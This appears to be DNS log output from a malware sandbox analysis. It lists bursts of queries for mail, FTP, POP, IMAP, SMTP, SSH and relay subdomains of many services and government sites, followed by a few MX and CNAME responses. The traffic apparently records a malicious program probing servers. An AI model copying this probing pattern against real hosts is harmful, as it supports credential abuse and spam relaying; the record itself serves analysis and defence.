                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.312689066 CET192.168.2.61.1.1.10x88aStandard query (0)ftp.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.312689066 CET192.168.2.61.1.1.10x473fStandard query (0)ftp.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.312952042 CET192.168.2.61.1.1.10x7340Standard query (0)ftp.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.312952042 CET192.168.2.61.1.1.10xf0f8Standard query (0)pop.ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.312952042 CET192.168.2.61.1.1.10xbad3Standard query (0)relay.ro.bongacams.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.337090969 CET192.168.2.61.1.1.10x964Standard query (0)mail.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.337230921 CET192.168.2.61.1.1.10xa4d3Standard query (0)mail.ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.340820074 CET192.168.2.61.1.1.10x413eStandard query (0)mail.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.340821028 CET192.168.2.61.1.1.10x78edStandard query (0)ftp.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.345436096 CET192.168.2.61.1.1.10x84f6Standard query (0)ftp.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.349050999 CET192.168.2.61.1.1.10x76daStandard query (0)pop.account.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.349050999 CET192.168.2.61.1.1.10x7d49Standard query (0)smtp.v.xsanime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.352492094 CET192.168.2.61.1.1.10xb223Standard query (0)student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.355762959 CET192.168.2.61.1.1.10x50f2Standard query (0)ftp.signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.400013924 CET192.168.2.61.1.1.10x17c0Standard query (0)ftp.us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.400013924 CET192.168.2.61.1.1.10x81e6Standard query (0)ssh.brasilliker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.400803089 CET192.168.2.61.1.1.10xcc36Standard query (0)pop.servicios.sat.gob.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.401232004 CET192.168.2.61.1.1.10x8817Standard query (0)pop.midetuvelocidad.claro.com.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.402019978 CET192.168.2.61.1.1.10xc5d3Standard query (0)ssh.ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.406260014 CET192.168.2.61.1.1.10xf1d3Standard query (0)pop.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.406754017 CET192.168.2.61.1.1.10xc41aStandard query (0)pop.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.408082962 CET192.168.2.61.1.1.10xb204Standard query (0)ssh.servicios.sat.gob.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.426711082 CET192.168.2.61.1.1.10x5cc0Standard query (0)mailgate.idp.uitgeverij-deviant.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.431658030 CET192.168.2.61.1.1.10x2851Standard query (0)mailgate.store.steampowered.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.431658030 CET192.168.2.61.1.1.10x8dcaStandard query (0)mailgate.us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.431658030 CET192.168.2.61.1.1.10x1e41Standard query (0)mail.auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.436873913 CET192.168.2.61.1.1.10x3f54Standard query (0)ssh.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.438569069 CET192.168.2.61.1.1.10xf8d3Standard query (0)ssh.signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.847357988 CET192.168.2.61.1.1.10x7204Standard query (0)relay.ro.bongacams.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.847357988 CET192.168.2.61.1.1.10xd14bStandard query (0)mail.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.847357988 CET192.168.2.61.1.1.10x9218Standard query (0)smtp.brasilliker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.848006964 CET192.168.2.61.1.1.10x5b19Standard query (0)mail.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.848006964 CET192.168.2.61.1.1.10x894bStandard query (0)mail.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.848150969 CET192.168.2.61.1.1.10xde6dStandard query (0)imap.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.850925922 CET192.168.2.61.1.1.10x202bStandard query (0)ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.850925922 CET192.168.2.61.1.1.10xdccaStandard query (0)ftp.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:06.727649927 CET192.168.2.61.1.1.10xb2a3Standard query (0)mail.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:06.730515003 CET192.168.2.61.1.1.10xdd3bStandard query (0)pop.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:06.741781950 CET192.168.2.61.1.1.10xd3aeStandard query (0)ftp.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:12.030955076 CET192.168.2.61.1.1.10xe0ffStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.452419996 CET192.168.2.61.1.1.10x12baStandard query (0)zuhauseplus.vodafone.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.454808950 CET192.168.2.61.1.1.10xd553Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.454916000 CET192.168.2.61.1.1.10x6ec2Standard query (0)srienlinea.sri.gob.ecA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.455857992 CET192.168.2.61.1.1.10xa539Standard query (0)ftp.steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.461436033 CET192.168.2.61.1.1.10xc914Standard query (0)mailgate.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.462601900 CET192.168.2.61.1.1.10xc441Standard query (0)mail.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.463671923 CET192.168.2.61.1.1.10x91eeStandard query (0)pop.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.464714050 CET192.168.2.61.1.1.10x2ce8Standard query (0)relay.ro.bongacams.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.465531111 CET192.168.2.61.1.1.10xf650Standard query (0)sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.465709925 CET192.168.2.61.1.1.10x37aaStandard query (0)mailgate.signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.466674089 CET192.168.2.61.1.1.10x6a1cStandard query (0)pop3.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.467464924 CET192.168.2.61.1.1.10xbe93Standard query (0)mail.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.467633009 CET192.168.2.61.1.1.10x15ebStandard query (0)pop3.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.468509912 CET192.168.2.61.1.1.10x2895Standard query (0)mailgate.contribuyente.seniat.gob.veA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.468699932 CET192.168.2.61.1.1.10x295dStandard query (0)etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.469501019 CET192.168.2.61.1.1.10x9c55Standard query (0)mail.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.469655991 CET192.168.2.61.1.1.10x2411Standard query (0)smtp.brasilliker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.470187902 CET192.168.2.61.1.1.10xfa65Standard query (0)ftp.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.473335981 CET192.168.2.61.1.1.10x4002Standard query (0)ucv.blackboard.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.477986097 CET192.168.2.61.1.1.10xaecfStandard query (0)milogin.michigan.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.480982065 CET192.168.2.61.1.1.10x49f9Standard query (0)m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.484663010 CET192.168.2.61.1.1.10xbe47Standard query (0)store.steampowered.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.493170977 CET192.168.2.61.1.1.10x87ebStandard query (0)zarkana2.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.496536016 CET192.168.2.61.1.1.10x9388Standard query (0)m.codere.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.497508049 CET192.168.2.61.1.1.10x46d0Standard query (0)app.plex.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.499682903 CET192.168.2.61.1.1.10x4dd5Standard query (0)ftp.gitam.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.502684116 CET192.168.2.61.1.1.10x677Standard query (0)us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.505111933 CET192.168.2.61.1.1.10xe226Standard query (0)oferta.senasofiaplus.edu.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.508147001 CET192.168.2.61.1.1.10x1a10Standard query (0)pxndx-mcr.boletia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.511420965 CET192.168.2.61.1.1.10xb503Standard query (0)mail.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.513185024 CET192.168.2.61.1.1.10x8c5bStandard query (0)gitam.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.515470028 CET192.168.2.61.1.1.10xb86fStandard query (0)mail.signup2.br.leagueoflegends.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.515753031 CET192.168.2.61.1.1.10xba3eStandard query (0)tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.516339064 CET192.168.2.61.1.1.10x1aeStandard query (0)mail.signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.516681910 CET192.168.2.61.1.1.10x85b4Standard query (0)mail.sport.autoplay.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.517209053 CET192.168.2.61.1.1.10x366Standard query (0)app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.518177986 CET192.168.2.61.1.1.10x12bcStandard query (0)ftp.milogin.michigan.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.520037889 CET192.168.2.61.1.1.10x6556Standard query (0)ftp.zuhauseplus.vodafone.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.522536039 CET192.168.2.61.1.1.10x3a6bStandard query (0)mxa-00569201.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.523857117 CET192.168.2.61.1.1.10xbb34Standard query (0)hi-in.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.673938036 CET192.168.2.61.1.1.10xccafStandard query (0)account.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.682214975 CET192.168.2.61.1.1.10x6c92Standard query (0)cloud.simplify3d.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.682960987 CET192.168.2.61.1.1.10xaa8cStandard query (0)pt.secure.imvu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.743438959 CET192.168.2.61.1.1.10x8c41Standard query (0)servicossociais.caixa.gov.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.743680954 CET192.168.2.61.1.1.10xc1c8Standard query (0)genshin.mihoyo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.399724960 CET192.168.2.61.1.1.10xc2fcStandard query (0)mail.student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.399724960 CET192.168.2.61.1.1.10xa0ddStandard query (0)imap.m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.399724960 CET192.168.2.61.1.1.10xecd1Standard query (0)mailgate.student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.409499884 CET192.168.2.61.1.1.10x5217Standard query (0)mailgate.midetuvelocidad.claro.com.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.418179989 CET192.168.2.61.1.1.10x7462Standard query (0)auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.420265913 CET192.168.2.61.1.1.10x8da9Standard query (0)mailgate.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.420559883 CET192.168.2.61.1.1.10x284cStandard query (0)relay.brasilliker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.421730995 CET192.168.2.61.1.1.10x589aStandard query (0)smtp.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.422904968 CET192.168.2.61.1.1.10x870cStandard query (0)relay.uh.isA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.434345961 CET192.168.2.61.1.1.10xeed0Standard query (0)imap.transaccional.saludtotal.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.435446024 CET192.168.2.61.1.1.10x70ddStandard query (0)relay.account.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.438077927 CET192.168.2.61.1.1.10xbae8Standard query (0)mail.us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.443805933 CET192.168.2.61.1.1.10x63d6Standard query (0)mailgate.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.446270943 CET192.168.2.61.1.1.10xf49bStandard query (0)mailgate.analvids.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.446466923 CET192.168.2.61.1.1.10xcd1dStandard query (0)pop.sport.autoplay.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.461990118 CET192.168.2.61.1.1.10xb3dcStandard query (0)www.hero-wars.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.464070082 CET192.168.2.61.1.1.10x8e7cStandard query (0)imap.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.475303888 CET192.168.2.61.1.1.10xd12aStandard query (0)relay.vidcorn.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.557367086 CET192.168.2.61.1.1.10x8415Standard query (0)imap.s163-es.ogame.gameforge.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.559813976 CET192.168.2.61.1.1.10xe4f4Standard query (0)imap.signup2.br.leagueoflegends.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.561467886 CET192.168.2.61.1.1.10x3162Standard query (0)smtp.signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.561620951 CET192.168.2.61.1.1.10xc4c5Standard query (0)relay.contribuyente.seniat.gob.veA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.562714100 CET192.168.2.61.1.1.10x6865Standard query (0)relay.signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.573221922 CET192.168.2.61.1.1.10x8a62Standard query (0)imap.loopex.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.616229057 CET192.168.2.61.1.1.10x5dceStandard query (0)ssh.zuhauseplus.vodafone.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.627016068 CET192.168.2.61.1.1.10xd4bbStandard query (0)mailgate.m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.628314018 CET192.168.2.61.1.1.10x987cStandard query (0)imap.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.629371881 CET192.168.2.61.1.1.10x77f5Standard query (0)relay.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.683039904 CET192.168.2.61.1.1.10xb6aeStandard query (0)pop.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.727118015 CET192.168.2.61.1.1.10xbe12Standard query (0)www.kwyk.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.731177092 CET192.168.2.61.1.1.10xaef9Standard query (0)ssh.gitam.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.763607025 CET192.168.2.61.1.1.10x870cStandard query (0)relay.uh.isA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.763647079 CET192.168.2.61.1.1.10x8da9Standard query (0)mailgate.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.842365026 CET192.168.2.61.1.1.10xf650Standard query (0)sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.842391968 CET192.168.2.61.1.1.10x49f9Standard query (0)m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.843630075 CET192.168.2.61.1.1.10xa127Standard query (0)mailgate.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.878983974 CET192.168.2.61.1.1.10xa2ffStandard query (0)pop3.mitextoescolar.mineduc.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.935889006 CET192.168.2.61.1.1.10xe549Standard query (0)pop3.sport.autoplay.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.941828966 CET192.168.2.61.1.1.10xa82aStandard query (0)relay.student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.960820913 CET192.168.2.61.1.1.10xd4bbStandard query (0)mailgate.m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.960839987 CET192.168.2.61.1.1.10x5dceStandard query (0)ssh.zuhauseplus.vodafone.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.970211983 CET192.168.2.61.1.1.10xb289Standard query (0)mailgate.ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.973253965 CET192.168.2.61.1.1.10xed7bStandard query (0)relay.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.996809006 CET192.168.2.61.1.1.10x44faStandard query (0)relay.idp.uitgeverij-deviant.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.000688076 CET192.168.2.61.1.1.10x4b5dStandard query (0)mail.auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.001904011 CET192.168.2.61.1.1.10xdad4Standard query (0)imap.us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.004074097 CET192.168.2.61.1.1.10xf8e2Standard query (0)mailgate.transaccional.saludtotal.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.004822016 CET192.168.2.61.1.1.10xeedStandard query (0)relay.midetuvelocidad.claro.com.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.027905941 CET192.168.2.61.1.1.10x52c0Standard query (0)pop3.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.028069973 CET192.168.2.61.1.1.10x24a3Standard query (0)relay.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.035620928 CET192.168.2.61.1.1.10x3b03Standard query (0)smtp.ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.064187050 CET192.168.2.61.1.1.10xa272Standard query (0)smtp.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.065747023 CET192.168.2.61.1.1.10x708cStandard query (0)mailgate.s163-es.ogame.gameforge.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.086647987 CET192.168.2.61.1.1.10x1887Standard query (0)mailgate.sport.autoplay.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.087848902 CET192.168.2.61.1.1.10x3375Standard query (0)relay.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.091247082 CET192.168.2.61.1.1.10x1aaeStandard query (0)mailgate.loopex.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.116678953 CET192.168.2.61.1.1.10x51b0Standard query (0)mailgate.signup2.br.leagueoflegends.comA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.231870890 CET1.1.1.1192.168.2.60x9aeNo error (0)analvids.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.231870890 CET1.1.1.1192.168.2.60x9aeNo error (0)analvids.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.233191013 CET1.1.1.1192.168.2.60x6f7fNo error (0)accounts.google.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.233191013 CET1.1.1.1192.168.2.60x6f7fNo error (0)accounts.google.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.233191013 CET1.1.1.1192.168.2.60x6f7fNo error (0)accounts.google.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.233191013 CET1.1.1.1192.168.2.60x6f7fNo error (0)accounts.google.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.233191013 CET1.1.1.1192.168.2.60x6f7fNo error (0)accounts.google.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.251804113 CET1.1.1.1192.168.2.60xb9f0No error (0)gitam.zoom.uswww.zoom.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.251804113 CET1.1.1.1192.168.2.60xb9f0No error (0)www.zoom.uszoom.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.251804113 CET1.1.1.1192.168.2.60xb9f0No error (0)zoom.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.251804113 CET1.1.1.1192.168.2.60xb9f0No error (0)zoom.usMX (Mail exchange)IN (0x0001)false
